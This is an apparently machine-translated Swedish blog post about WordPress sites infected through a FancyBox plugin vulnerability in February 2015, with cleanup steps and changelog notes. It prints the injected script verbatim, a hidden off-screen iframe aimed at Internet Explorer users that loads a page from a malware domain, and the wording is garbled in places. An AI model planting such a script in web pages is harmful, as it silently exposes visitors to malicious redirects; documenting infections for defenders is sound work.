Tidigare i veckan ett antal webbplatser och bloggar WordPress, fick varningar från infekterade med skadlig kod genom google Webmasters.
Det problem till vilket google Webmasters avses är närvaron av en torsk / skript iframe malware käll webbplatser.
<script>if (navigator.userAgent.match(/msie/i)) { document.write(' <div style="position:absolute;left:-2000px;width:2000px"><iframe src="http://203koko.eu/hjnfh/ipframe2.php" width="20" height="30" ></iframe></div>'); }</script>
Det verkar som om det är en sårbarhet a pluginregelverk FancyBox för WordPress som fram igår (05.02.2015) inte hade uppdaterats på länge.
Lösa detta problem och desinficering virus platser med denna malware, är relativt enkel.
1. Inaktivera FancyBox-tillägget.
2. Ta bort alla FancyBox-pluginsfiler från servern (via FTP)
3. Installera den nya versionen av plugin-programmet (Fancybox 3.0.4)
FancyBox för WordPress 3.0.4
- Bytte namn på inställningen som påverkas av säkerhetsproblemet som nämns i 3.0.3. Detta bör stoppa den skadliga koden från att visas på webbplatser där plugin-programmet finns updated utan att ta bort den skadliga koden.
FancyBox för WordPress 3.0.3
- Fixat ett säkerhetsproblem.
Malware Info:
TYP: Iframe omdirigering
TARGET: WordPress Snygg låda
MALWARE OMRÅDE: 203koko.eu
MALWARE URI: http://203koko.eu/hjnfh/ipframe2.php
MALWARE RAW KODER:
MALWARE SKRIFTLIG: if (navigator.userAgent.match(/msie/i)) { document.write(‘
Ta bort skadlig programvara från din WordPress webbplats.